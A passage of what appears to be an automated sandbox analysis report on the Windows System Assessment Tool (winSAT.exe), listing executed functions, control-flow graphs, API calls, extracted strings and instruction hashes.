7ff780fa28c4 36 API calls 34334->34336 34337 7ff780fa07cd _CxxThrowException 34335->34337 34339 7ff780f9ecd2 34336->34339 34338 7ff780fa07e2 _CxxThrowException 34337->34338 34340 7ff780fa07f7 _CxxThrowException 34338->34340 34341 7ff780fcf3b4 44 API calls 34339->34341 34342 7ff780fa0812 _CxxThrowException 34340->34342 34343 7ff780fa04b5 34341->34343 34344 7ff780fa082d _CxxThrowException 34342->34344 34345 7ff780fa0516 34343->34345 34348 7ff780fa0af1 _CxxThrowException 34343->34348 34351 7ff780fa8a40 GetStringTypeExW 34343->34351 34346 7ff780fa0848 _CxxThrowException 34344->34346 34347 7ff780fca818 104 API calls 34345->34347 34349 7ff780fa0863 _CxxThrowException 34346->34349 34350 7ff780fa051d SetConsoleCtrlHandler 34347->34350 34353 7ff780fa0b0d _CxxThrowException 34348->34353 34352 7ff780fa087e 18 API calls 34349->34352 34354 7ff780fa0531 GetLastError 34350->34354 34355 7ff780fa0583 34350->34355 34366 7ff780fa04d3 34351->34366 34356 7ff780fa0a69 _CxxThrowException 34352->34356 34357 7ff780fa0b51 34353->34357 34358 7ff780fa0b41 FreeLibrary 34353->34358 34395 7ff780fa9820 LoadLibraryExW FormatMessageW GetStringTypeExW FreeLibrary 34354->34395 34361 7ff780fa0591 34355->34361 34396 7ff780f9a698 27 API calls 34355->34396 34360 7ff780fa0a84 _CxxThrowException _CxxThrowException _CxxThrowException _CxxThrowException 34356->34360 34358->34357 34360->34348 34364 7ff78100b75c 58 API calls 34361->34364 34367 7ff780fa059f 34361->34367 34362 7ff780fa054c 34362->34353 34365 7ff780fa9c0c 38 API calls 34362->34365 34364->34367 34368 7ff780fa0570 34365->34368 34366->34345 34369 7ff780fdb218 3 API calls 34366->34369 34370 7ff780fa05c8 RemoveDirectoryW 34367->34370 34371 7ff780fa05bc CoUninitialize 34367->34371 34372 7ff780fa2944 38 API calls 34368->34372 34373 7ff780fa0506 34369->34373 34377 7ff780fa05e6 34370->34377 34371->34370 34374 7ff780fa057b 34372->34374 34373->34345 34394 7ff780fdb318 RegOpenKeyExW RegSetValueExW RegCloseKey 34373->34394 34375 7ff780fa28c4 36 API calls 34374->34375 34375->34355 34378 7ff780fa0671 ReleaseMutex CloseHandle 34377->34378 34379 7ff780fa0697 34377->34379 34378->34379 34380 7ff780fa06e3 34379->34380 34397 7ff780f95c78 EventWriteTransfer 34379->34397 34382 7ff780fd5424 76 API calls 34380->34382 34383 7ff780fa06e8 34382->34383 34384 7ff780fcf510 23 API calls 34383->34384 34385 7ff780fa06ed 34384->34385 34386 7ff780fce3ac 23 API calls 34385->34386 34387 7ff780fa0704 34386->34387 34398 7ff780fce2f8 34 API calls 34387->34398 34394->34345 34395->34362 34396->34361 34397->34380

                                                                                                                                                                                              Executed Functions

                                                                                                                                                                                              Function 00007FF780F9AEC1 Relevance: 37.1, APIs: 11, Strings: 10, Instructions: 311librarynativeloaderCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CriticalEnabledErrorEventFileSection$AddressCloseControlCountCurrentDeviceEnterLastLeaveLibraryLoadProcProcessStatusTickWrite_snprintf_s_vsnprintf_s
                                                                                                                                                                                              • String ID: > Successfully reenabled EMD.$> Unable to reenable EMD device; %s$CKCLStart$ERROR: Could not disable cache hits: %x$INFO: DwmpRestartComposition() did not return OK!$Warning: Composition Restart not supported$Warning: Composition Restart not supported$base\winsat\exe\main.cpp$dwmapi.dll$filename
                                                                                                                                                                                              • API String ID: 1964248110-1335994959
                                                                                                                                                                                              • Opcode ID: e9eb2a1a579d24866fde3a24d272d10362c80194d6bbfe6e952583cb9f19237b
                                                                                                                                                                                              • Instruction ID: f2b6ab72a4e2b2b780bcfb32ffc05197af4baf3275ade767dbcf3e5f192bc1ba
                                                                                                                                                                                              • Opcode Fuzzy Hash: e9eb2a1a579d24866fde3a24d272d10362c80194d6bbfe6e952583cb9f19237b
                                                                                                                                                                                              • Instruction Fuzzy Hash: 50D19C22A0C64282EB14FB62E8502B8A760FF85B58FE49136DA4D477D5DF7CF445C360
                                                                                                                                                                                              Function 00007FF781019BA4 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 355libraryCOMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Library$Free$DefaultLanguageLoadVersion$FindInfoLocalePathResourceSearchSystemUsermemsetwcsncmp
                                                                                                                                                                                              • String ID: %s\%s$MUI
                                                                                                                                                                                              • API String ID: 1026695814-2651373239
                                                                                                                                                                                              • Opcode ID: 701d8b758094d34970f139c57480a43268e7718bfe01592a2d53b6fbec55cb7e
                                                                                                                                                                                              • Instruction ID: 363af238377d576cbbbbec4bae6d7fbaf2777f2314588a00fc94a4b3d68e4788
                                                                                                                                                                                              • Opcode Fuzzy Hash: 701d8b758094d34970f139c57480a43268e7718bfe01592a2d53b6fbec55cb7e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 5DE1C265A1CA8286EB65BB9199006F9E3A1FF45BC4FE51432ED4E07B48EF7CE501C320
                                                                                                                                                                                              Function 00007FF780FAD00C Relevance: 173.0, APIs: 67, Strings: 31, Instructions: 1479COMMON
                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$CloseCommandLineOpenQueryValue
                                                                                                                                                                                              • String ID: %windir%\performance\winsat\$-- Skipping Schema check! (private only)$SaveETLFiles$SuppressWatchDogTimer$admp$base\winsat\exe\app.cpp$cancelevent$cpuff$datastore$fonbat$glpi$help$icn$iguid$iter$kdr$log$moobegoevent$no file name after the -cpuff switch$no file name after the -txml switch$note$requirebatt$ssc$suppresswd$txml$unsupported$watchdog$wsswap$xml$xwait$xwdfinal
                                                                                                                                                                                              • API String ID: 2913300774-4180261194
                                                                                                                                                                                              • Opcode ID: b353203be41a2b1269e035ff50954222662dba66c0a6a26e508a4c20b0642890
                                                                                                                                                                                              • Instruction ID: 74a1da2d596fd0cc2e18872968ef45507e2f5428e1d69df95ea52146eec2e7d4
                                                                                                                                                                                              • Opcode Fuzzy Hash: b353203be41a2b1269e035ff50954222662dba66c0a6a26e508a4c20b0642890
                                                                                                                                                                                              • Instruction Fuzzy Hash: 07E26B22F0D64696EB10FBA2E8500FCA771BF45748BE49436C90E17ADADF6CE915C360
                                                                                                                                                                                              Function 00007FF780F9F291 Relevance: 112.6, APIs: 47, Strings: 17, Instructions: 563synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 617 7ff780f9f291-7ff780f9f309 619 7ff780f9f318-7ff780f9f322 617->619 620 7ff780f9f30b-7ff780f9f312 617->620 621 7ff780f9f328-7ff780f9f3af call 7ff780fdc700 call 7ff780fa9c0c * 2 call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac call 7ff780f9a3c0 619->621 622 7ff780fa0a69-7ff780fa0af0 _CxxThrowException * 5 619->622 620->619 623 7ff780f9f528-7ff780f9f52f 620->623 748 7ff780f9f3b5-7ff780f9f408 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 621->748 749 7ff780fa07cd-7ff780fa080d _CxxThrowException * 3 621->749 632 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 622->632 624 7ff780f9f5a2-7ff780f9f5c3 CreateEventW 623->624 625 7ff780f9f531-7ff780f9f538 623->625 628 7ff780f9f603-7ff780f9f614 ResetEvent 624->628 629 7ff780f9f5c5-7ff780f9f5fc GetLastError call 7ff780fa96e0 call 7ff780fce3ac 624->629 625->624 630 7ff780f9f53a-7ff780f9f544 625->630 637 7ff780f9f692-7ff780f9f6aa SetConsoleCtrlHandler 628->637 638 7ff780f9f616-7ff780f9f63b GetLastError call 7ff780fa9820 628->638 629->628 634 7ff780fa0812-7ff780fa0828 _CxxThrowException 630->634 635 7ff780f9f54a-7ff780f9f59d call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 630->635 639 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 632->639 640 7ff780fa082d-7ff780fa0843 _CxxThrowException 634->640 708 7ff780fa04a4-7ff780fa04bc call 7ff780fcf3b4 635->708 642 7ff780f9f705-7ff780f9f70f 637->642 643 7ff780f9f6ac-7ff780f9f6b6 637->643 638->640 664 7ff780f9f641-7ff780f9f68d call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 638->664 647 7ff780fa0b51-7ff780fa0b56 639->647 648 7ff780fa0b41-7ff780fa0b4d FreeLibrary 639->648 651 7ff780fa0848-7ff780fa085e _CxxThrowException 640->651 649 7ff780f9f711-7ff780f9f730 ReleaseMutex CloseHandle 642->649 650 7ff780f9f737-7ff780f9f764 CreateMutexW GetLastError 642->650 643->651 653 7ff780f9f6bc-7ff780f9f700 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 643->653 648->647 649->650 657 7ff780f9f81a-7ff780f9f821 650->657 658 7ff780f9f76a-7ff780f9f77b GetLastError 650->658 659 7ff780fa0863-7ff780fa0879 _CxxThrowException 651->659 653->642 668 7ff780f9f823-7ff780f9f82a 657->668 669 7ff780f9f83d-7ff780f9f856 call 7ff780fd5178 657->669 665 7ff780f9f781-7ff780f9f7a6 GetLastError call 7ff780fa9820 658->665 666 7ff780f9f8b9-7ff780f9f8c3 658->666 667 7ff780fa087e-7ff780fa0a68 _CxxThrowException * 18 659->667 664->637 665->659 696 7ff780f9f7ac-7ff780f9f815 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780f92e8c call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 665->696 666->667 674 7ff780f9f8c9-7ff780f9f91c call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 666->674 667->622 676 7ff780f9f830-7ff780f9f837 668->676 677 7ff780f9f9aa-7ff780f9f9e6 call 7ff780f9d0d4 668->677 669->708 674->708 676->669 687 7ff780f9f984-7ff780f9f98b 676->687 714 7ff780f9fa18 677->714 715 7ff780f9f9e8-7ff780f9f9f3 677->715 687->677 697 7ff780f9f98d-7ff780f9f994 687->697 696->657 697->677 707 7ff780f9f996-7ff780f9f9a5 call 7ff780fce3ac 697->707 707->677 731 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 708->731 732 7ff780fa04be-7ff780fa04c8 708->732 714->708 724 7ff780f9fa0f-7ff780f9fa17 call 7ff7810a458c 715->724 725 7ff780f9f9f5-7ff780f9fa05 call 7ff780fa7e24 715->725 724->714 751 7ff780f9fa07 725->751 755 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 731->755 756 7ff780fa0583-7ff780fa058a 731->756 732->632 740 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 732->740 740->731 764 7ff780fa04d7-7ff780fa04de 740->764 748->708 749->634 751->724 755->639 778 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 755->778 766 7ff780fa0591-7ff780fa0598 756->766 767 7ff780fa058c call 7ff780f9a698 756->767 764->731 773 7ff780fa04e0-7ff780fa04e7 764->773 768 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 766->768 769 7ff780fa059a-7ff780fa059f call 7ff78100b75c 766->769 767->766 792 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 768->792 793 7ff780fa05bc-7ff780fa05c3 CoUninitialize 768->793 769->768 773->731 780 7ff780fa04e9-7ff780fa04f0 773->780 778->756 780->731 786 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 780->786 786->731 802 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 786->802 798 7ff780fa05e6-7ff780fa05ed 792->798 799 7ff780fa0635-7ff780fa063a 792->799 793->792 798->799 805 7ff780fa05ef-7ff780fa05f9 798->805 803 7ff780fa0665-7ff780fa066f 799->803 804 7ff780fa063c-7ff780fa0643 799->804 802->731 812 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 803->812 813 7ff780fa0697-7ff780fa069e 803->813 810 7ff780fa0645-7ff780fa064f 804->810 811 7ff780fa065e 804->811 805->799 814 7ff780fa05fb-7ff780fa061a 805->814 810->811 815 7ff780fa0651 810->815 811->803 812->813 816 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 813->816 817 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 813->817 814->799 822 7ff780fa061c-7ff780fa0628 814->822 815->811 816->817 817->634 822->799
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CloseConsoleCtrlDirectoryErrorHandleHandlerLastMutexReleaseRemoveUninitialize
                                                                                                                                                                                              • String ID: > IsFormal=TRUE IsMoobe=%s.$> exit value = %d.$Cleanup and exit$ERROR: User required this run be on bateries, but the machine is not currently on batteries.$ERROR: another copy of winsat is already running$ERROR: can't run formal assessment on OS's earlier than Vista$ERROR: cannot create event: %s$ERROR: cannot create mutex: %S$ERROR: cannot reset event: %S$ERROR: cannot set control C handler!$FALSE$Global\WinSATMutex$PrivateError2$TRUE$Watch dog timer is suppressed for a formal assessment$A#$U5
                                                                                                                                                                                              • API String ID: 2331052687-1238877241
                                                                                                                                                                                              • Opcode ID: 24c345b2ecde66455f44fa867704bec9a2ba5752caf8f3e1baafbcee0677e468
                                                                                                                                                                                              • Instruction ID: 457298799e4672734ed04cb4cb38c8b6a5131cb83a540ff1ba53a345d522af21
                                                                                                                                                                                              • Opcode Fuzzy Hash: 24c345b2ecde66455f44fa867704bec9a2ba5752caf8f3e1baafbcee0677e468
                                                                                                                                                                                              • Instruction Fuzzy Hash: 05525961E0D68395EB20BB16F8502FAEB60BF81744FF49035D94E46796DEBCE548CB20
                                                                                                                                                                                              Function 00007FF780F9F068 Relevance: 96.7, APIs: 44, Strings: 11, Instructions: 457synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 834 7ff780f9f068-7ff780f9f072 835 7ff780fa07b8-7ff780fa07c8 _CxxThrowException 834->835 836 7ff780f9f078-7ff780f9f07f call 7ff780fa8a40 834->836 838 7ff780fa07cd-7ff780fa080d _CxxThrowException * 3 835->838 841 7ff780f9f142-7ff780f9f151 call 7ff780fce3ac 836->841 842 7ff780f9f085-7ff780f9f08c 836->842 845 7ff780fa0812-7ff780fa0a68 _CxxThrowException * 22 838->845 849 7ff780f9f156-7ff780f9f17b GetCommandLineW 841->849 842->841 844 7ff780f9f092-7ff780f9f099 842->844 844->841 848 7ff780f9f09f-7ff780f9f0a6 call 7ff780f9a780 844->848 860 7ff780fa0a69-7ff780fa0a7f _CxxThrowException 845->860 848->849 857 7ff780f9f0ac-7ff780f9f0d1 GetLastError call 7ff780fa9820 848->857 852 7ff780f9f17e-7ff780f9f186 849->852 852->852 855 7ff780f9f188-7ff780f9f18f 852->855 858 7ff780f9f1f2-7ff780f9f226 GetSystemMetrics call 7ff780f98420 855->858 859 7ff780f9f191-7ff780f9f1ed call 7ff780f95c78 855->859 870 7ff780fa07a3-7ff780fa07b3 _CxxThrowException 857->870 871 7ff780f9f0d7-7ff780f9f13d call 7ff780fdc99c call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 857->871 867 7ff780f9f228-7ff780f9f22c 858->867 868 7ff780f9f22e-7ff780f9f238 858->868 859->858 865 7ff780fa0a84-7ff780fa0af0 _CxxThrowException * 4 860->865 869 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 865->869 867->868 872 7ff780f9f24a 867->872 868->865 873 7ff780f9f23e-7ff780f9f248 call 7ff780fa8a40 868->873 874 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 869->874 870->835 899 7ff780fa04a4-7ff780fa04bc call 7ff780fcf3b4 871->899 877 7ff780f9f24d-7ff780f9f250 872->877 873->872 873->877 878 7ff780fa0b51-7ff780fa0b56 874->878 879 7ff780fa0b41-7ff780fa0b4d FreeLibrary 874->879 882 7ff780f9f252-7ff780f9f259 877->882 883 7ff780f9f25b 877->883 879->878 882->883 886 7ff780f9f260-7ff780f9f322 882->886 883->886 886->860 892 7ff780f9f328-7ff780f9f3af call 7ff780fdc700 call 7ff780fa9c0c * 2 call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac call 7ff780f9a3c0 886->892 892->838 943 7ff780f9f3b5-7ff780f9f408 call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac 892->943 905 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 899->905 906 7ff780fa04be-7ff780fa04c8 899->906 915 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 905->915 916 7ff780fa0583-7ff780fa058a 905->916 906->869 909 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 906->909 909->905 920 7ff780fa04d7-7ff780fa04de 909->920 915->874 932 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 915->932 921 7ff780fa0591-7ff780fa0598 916->921 922 7ff780fa058c call 7ff780f9a698 916->922 920->905 927 7ff780fa04e0-7ff780fa04e7 920->927 923 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 921->923 924 7ff780fa059a-7ff780fa059f call 7ff78100b75c 921->924 922->921 944 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 923->944 945 7ff780fa05bc-7ff780fa05c3 CoUninitialize 923->945 924->923 927->905 933 7ff780fa04e9-7ff780fa04f0 927->933 932->916 933->905 938 7ff780fa04f2-7ff780fa0508 call 7ff780fdb218 933->938 938->905 952 7ff780fa050a-7ff780fa0511 call 7ff780fdb318 938->952 943->899 949 7ff780fa05e6-7ff780fa05ed 944->949 950 7ff780fa0635-7ff780fa063a 944->950 945->944 949->950 956 7ff780fa05ef-7ff780fa05f9 949->956 953 7ff780fa0665-7ff780fa066f 950->953 954 7ff780fa063c-7ff780fa0643 950->954 952->905 961 7ff780fa0671-7ff780fa0690 ReleaseMutex CloseHandle 953->961 962 7ff780fa0697-7ff780fa069e 953->962 959 7ff780fa0645-7ff780fa064f 954->959 960 7ff780fa065e 954->960 956->950 964 7ff780fa05fb-7ff780fa061a 956->964 959->960 965 7ff780fa0651 959->965 960->953 961->962 966 7ff780fa06a0-7ff780fa06de call 7ff780f95c78 962->966 967 7ff780fa06e3-7ff780fa0721 call 7ff780fd5424 call 7ff780fcf510 call 7ff780fce3ac call 7ff780fce2f8 call 7ff780fa7e24 * 2 962->967 964->950 975 7ff780fa061c-7ff780fa0628 964->975 965->960 966->967 967->845 975->950
                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 00000016.00000002.2235531661.00007FF780F91000.00000020.00000001.01000000.00000012.sdmp, Offset: 00007FF780F90000, based on PE: true
                                                                                                                                                                                              • Associated: 00000016.00000002.2235480708.00007FF780F90000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235836355.00007FF7810B1000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2235948583.00007FF78110D000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236004824.00007FF78110E000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236050867.00007FF78110F000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236087919.00007FF781110000.00000008.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236398901.00007FF781167000.00000004.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              • Associated: 00000016.00000002.2236447819.00007FF781174000.00000002.00000001.01000000.00000012.sdmpDownload File
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_22_2_7ff780f90000_winSAT.jbxd
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: ExceptionThrow$Close$CriticalEnabledErrorEventLastOpenSectionValue__uncaught_exception$CommandConsoleCountCtrlCurrentDirectoryEnterFreeHandleHandlerLeaveLibraryLineMetricsMutexProcessQueryReleaseRemoveStringSystemTickTypeUninitialize_snprintf_s_vsnprintf_svswprintf_s
                                                                                                                                                                                              • String ID: > IsFormal=TRUE IsMoobe=%s.$> exit value = %d.$Cleanup and exit$ERROR: can't run formal assessment on OS's earlier than Vista$ERROR: cannot init winsat registry entries: %S$FALSE$PrivateError2$Skipping writing the Initial values to the registry - Axe Mode$TRUE$A#$U5
                                                                                                                                                                                              • API String ID: 610430588-4251460366
                                                                                                                                                                                              • Opcode ID: 80039041c9856d7e1ddefaf79e36c49a4fd9bb9cd098114acd0a909537907355
                                                                                                                                                                                              • Instruction ID: d099fe217ab1efe599d49b00ae5e09c61d4fe3370080490f06fba7212d47ba28
                                                                                                                                                                                              • Opcode Fuzzy Hash: 80039041c9856d7e1ddefaf79e36c49a4fd9bb9cd098114acd0a909537907355
                                                                                                                                                                                              • Instruction Fuzzy Hash: 89327E61E0D68395EB20FB15F8502F9BB61FF81744FF09035D68E466A9DEACE548CB20
                                                                                                                                                                                              Function 00007FF780F9EE67 Relevance: 89.6, APIs: 46, Strings: 5, Instructions: 343synchronizationCOMMON
                                                                                                                                                                                              Download Yara Rule

                                                                                                                                                                                              Control-flow Graph

                                                                                                                                                                                              • Executed
                                                                                                                                                                                              • Not Executed
                                                                                                                                                                                              control_flow_graph 991 7ff780f9ee67-7ff780f9ee95 GetLastError call 7ff780fa96e0 994 7ff780fa0741-7ff780fa080d _CxxThrowException * 9 991->994 995 7ff780f9ee9b-7ff780fa04bc call 7ff780fdc700 call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 call 7ff780fce3ac call 7ff780fcf3b4 991->995 1012 7ff780fa0812-7ff780fa0af0 _CxxThrowException * 27 994->1012 1022 7ff780fa0516-7ff780fa052f call 7ff780fca818 SetConsoleCtrlHandler 995->1022 1023 7ff780fa04be-7ff780fa04c8 995->1023 1026 7ff780fa0af1-7ff780fa0b0c _CxxThrowException 1012->1026 1032 7ff780fa0531-7ff780fa0556 GetLastError call 7ff780fa9820 1022->1032 1033 7ff780fa0583-7ff780fa058a 1022->1033 1023->1026 1027 7ff780fa04ce-7ff780fa04d5 call 7ff780fa8a40 1023->1027 1031 7ff780fa0b0d-7ff780fa0b3f _CxxThrowException 1026->1031 1027->1022 1038 7ff780fa04d7-7ff780fa04de 1027->1038 1035 7ff780fa0b51-7ff780fa0b56 1031->1035 1036 7ff780fa0b41-7ff780fa0b4d FreeLibrary 1031->1036 1032->1031 1048 7ff780fa055c-7ff780fa057e call 7ff780fa9c0c call 7ff780fa2944 call 7ff780fa28c4 1032->1048 1039 7ff780fa0591-7ff780fa0598 1033->1039 1040 7ff780fa058c call 7ff780f9a698 1033->1040 1036->1035 1038->1022 1044 7ff780fa04e0-7ff780fa04e7 1038->1044 1041 7ff780fa05a0-7ff780fa05ba call 7ff780f9ae84 1039->1041 1042 7ff780fa059a-7ff780fa059f call 7ff78100b75c 1039->1042 1040->1039 1057 7ff780fa05c8-7ff780fa05e4 RemoveDirectoryW 